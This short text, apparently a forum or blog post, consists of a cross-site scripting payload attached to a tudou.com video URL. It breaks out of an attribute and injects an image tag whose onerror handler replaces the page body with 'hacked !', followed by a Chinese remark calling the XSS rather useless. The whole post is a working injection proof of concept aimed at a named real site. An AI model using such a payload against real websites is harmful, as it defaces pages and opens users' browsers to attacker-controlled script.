http://www.tudou.com/programs/view/TLpmMpTY0eY/"><img src=# onerror='document.body.innerHTML=document.write("hacked !")'>

很鸡肋的xss...